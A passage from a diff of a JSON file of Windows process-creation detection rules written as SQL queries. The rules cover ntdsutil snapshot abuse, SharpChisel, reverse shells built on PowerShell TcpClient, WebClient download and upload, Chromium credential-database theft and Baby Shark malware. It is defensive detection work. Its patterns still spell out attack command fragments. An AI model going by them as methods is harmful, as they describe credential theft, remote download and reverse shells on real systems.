snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "status": "test", + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Legitimate use of dnx.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "status": "test", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", - "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "NTDS maintenance" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, 